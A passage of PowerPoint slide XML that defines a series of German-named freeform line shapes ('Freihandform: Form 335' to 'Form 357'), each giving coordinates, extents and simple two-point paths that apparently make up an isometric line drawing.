                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5319B22E-E5BB-40CB-BF00-8989E455A5EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604503" y="48719"/>
              <a:ext cx="709379" cy="410012"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 287902"/>
                <a:gd name="connsiteY0" fmla="*/ 163305 h 166404"/>
                <a:gd name="connsiteX1" fmla="*/ 287904 w 287902"/>
                <a:gd name="connsiteY1" fmla="*/ -3099 h 166404"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287902" h="166404">
                  <a:moveTo>
                    <a:pt x="1" y="163305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="287904" y="-3099"/>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36" name="Freihandform: Form 335">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F49175-BD1A-4D1C-AB64-35F68094B267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604503" y="322063"/>
              <a:ext cx="709544" cy="409776"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ 163233 h 166308"/>
                <a:gd name="connsiteX1" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ -3076 h 166308"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287969" h="166308">
                  <a:moveTo>
                    <a:pt x="1" y="163233"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="287970" y="-3076"/>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37" name="Freihandform: Form 336">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8DEE835-3507-45F8-A9A8-9331AF31D1E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841004" y="1004712"/>
              <a:ext cx="472341" cy="273814"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191701 w 191700"/>
                <a:gd name="connsiteY0" fmla="*/ 108105 h 111128"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 191700"/>
                <a:gd name="connsiteY1" fmla="*/ -3024 h 111128"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191700" h="111128">
                  <a:moveTo>
                    <a:pt x="191701" y="108105"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-302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38" name="Freihandform: Form 337">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96297018-7D94-4945-A4E7-0B24C80AAE6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604316" y="731607"/>
              <a:ext cx="237203" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96269"/>
                <a:gd name="connsiteY0" fmla="*/ -3053 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96270 w 96269"/>
                <a:gd name="connsiteY1" fmla="*/ 52416 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96269" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-3053"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96270" y="52416"/>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39" name="Freihandform: Form 338">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA253903-C0DC-498E-BE3E-DB18001C02E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841004" y="868509"/>
              <a:ext cx="236498" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ -3041 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ 52428 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95983" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-3041"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95984" y="5242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40" name="Freihandform: Form 339">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11890F7-1EF4-484A-AB2B-6552F7AF54EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6314000" y="-87720"/>
              <a:ext cx="23469" cy="1092666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ -3082 h 443460"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ 440378 h 443460"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="443460">
                  <a:moveTo>
                    <a:pt x="1" y="-3082"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="44037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41" name="Freihandform: Form 340">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B577CE7B-87CE-49A4-80D2-982EEE996675}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6313345" y="1004712"/>
              <a:ext cx="237437" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96365 w 96364"/>
                <a:gd name="connsiteY0" fmla="*/ -3029 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 96364"/>
                <a:gd name="connsiteY1" fmla="*/ 52344 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96364" h="55373">
                  <a:moveTo>
                    <a:pt x="96365" y="-3029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5234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42" name="Freihandform: Form 341">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{285864DB-0B4E-4AB5-8163-38C3D84653B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6078347" y="1141148"/>
              <a:ext cx="472435" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 191738"/>
                <a:gd name="connsiteY0" fmla="*/ -3012 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 191739 w 191738"/>
                <a:gd name="connsiteY1" fmla="*/ 107923 h 110935"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191738" h="110935">
                  <a:moveTo>
                    <a:pt x="1" y="-3012"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191739" y="107923"/>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45" name="Freihandform: Form 344">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F9C76B-F1B2-4EC7-A4DA-3F57E744E20E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604316" y="868280"/>
              <a:ext cx="163" cy="546678"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 66"/>
                <a:gd name="connsiteY0" fmla="*/ 218847 h 221870"/>
                <a:gd name="connsiteX1" fmla="*/ 68 w 66"/>
                <a:gd name="connsiteY1" fmla="*/ -3024 h 221870"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66" h="221870">
                  <a:moveTo>
                    <a:pt x="1" y="218847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="68" y="-302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46" name="Freihandform: Form 345">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B558093B-3DFE-4C84-8497-293CAB44931F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841004" y="1005182"/>
              <a:ext cx="23469" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107914 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3024 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110937">
                  <a:moveTo>
                    <a:pt x="1" y="107914"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-302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47" name="Freihandform: Form 346">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493D9448-8C3E-401D-AE0B-EDD29072FE44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604481" y="1415195"/>
              <a:ext cx="709520" cy="409783"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287961 w 287959"/>
                <a:gd name="connsiteY0" fmla="*/ -2983 h 166311"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 287959"/>
                <a:gd name="connsiteY1" fmla="*/ 163328 h 166311"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287959" h="166311">
                  <a:moveTo>
                    <a:pt x="287961" y="-2983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="16332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48" name="Freihandform: Form 347">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA0F249-77CD-431E-BC77-0E15D42B1D55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841004" y="1278526"/>
              <a:ext cx="473913" cy="272634"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 192339 w 192338"/>
                <a:gd name="connsiteY0" fmla="*/ -3000 h 110649"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 192338"/>
                <a:gd name="connsiteY1" fmla="*/ 107649 h 110649"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192338" h="110649">
                  <a:moveTo>
                    <a:pt x="192339" y="-3000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="107649"/>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49" name="Freihandform: Form 348">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF756FC7-1469-4355-ACDD-6219F9287025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841519" y="731607"/>
              <a:ext cx="235981" cy="136900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95773"/>
                <a:gd name="connsiteY0" fmla="*/ 52509 h 55561"/>
                <a:gd name="connsiteX1" fmla="*/ 95775 w 95773"/>
                <a:gd name="connsiteY1" fmla="*/ -3053 h 55561"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95773" h="55561">
                  <a:moveTo>
                    <a:pt x="1" y="52509"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95775" y="-3053"/>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50" name="Freihandform: Form 349">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48AA29C5-3558-4C58-8DB1-E0E72B6E8A3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604316" y="868280"/>
              <a:ext cx="236686" cy="136900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96059"/>
                <a:gd name="connsiteY0" fmla="*/ 52521 h 55561"/>
                <a:gd name="connsiteX1" fmla="*/ 96061 w 96059"/>
                <a:gd name="connsiteY1" fmla="*/ -3041 h 55561"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96059" h="55561">
                  <a:moveTo>
                    <a:pt x="1" y="52521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96061" y="-3041"/>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51" name="Freihandform: Form 350">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678CEE5B-D0B3-4D3C-8CEB-02D8DC476C9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841026" y="458731"/>
              <a:ext cx="23469" cy="272873"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107677 h 110746"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3070 h 110746"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110746">
                  <a:moveTo>
                    <a:pt x="1" y="107677"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-307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52" name="Freihandform: Form 351">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0D03F18-9221-40FE-8FED-AA5C96D6D97A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841026" y="-87954"/>
              <a:ext cx="23469" cy="273814"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 108012 h 111128"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3117 h 111128"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="111128">
                  <a:moveTo>
                    <a:pt x="1" y="108012"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3117"/>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53" name="Freihandform: Form 352">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45ACDEFF-FE28-4DC6-96D4-922712590476}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6077502" y="595404"/>
              <a:ext cx="23469" cy="273102"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107782 h 110839"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3058 h 110839"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110839">
                  <a:moveTo>
                    <a:pt x="1" y="107782"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-305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54" name="Freihandform: Form 353">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA7BF10-D26D-46D5-ADA1-AB94FBA7BC5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6077502" y="-224622"/>
              <a:ext cx="23469" cy="546685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 218756 h 221873"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3117 h 221873"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="221873">
                  <a:moveTo>
                    <a:pt x="1" y="218756"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3117"/>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55" name="Freihandform: Form 354">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{764DBBF4-2629-43D0-8A6E-F63CD5B8E312}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6550572" y="868509"/>
              <a:ext cx="236498" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ 52428 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ -3041 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95983" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="52428"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95984" y="-3041"/>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56" name="Freihandform: Form 355">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B78CCC-B092-42E7-8DD6-3118EFBEBAF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6550572" y="595404"/>
              <a:ext cx="236264" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95889 w 95888"/>
                <a:gd name="connsiteY0" fmla="*/ -3064 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95888"/>
                <a:gd name="connsiteY1" fmla="*/ 52309 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95888" h="55373">
                  <a:moveTo>
                    <a:pt x="95889" y="-3064"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="52309"/>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57" name="Freihandform: Form 356">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39233EA5-F699-4DF5-A0B5-910E92A579CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7023335" y="322063"/>
              <a:ext cx="236804" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96107"/>
                <a:gd name="connsiteY0" fmla="*/ 52379 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 96109 w 96107"/>
                <a:gd name="connsiteY1" fmla="*/ -3088 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96107" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="52379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96109" y="-308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58" name="Freihandform: Form 357">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
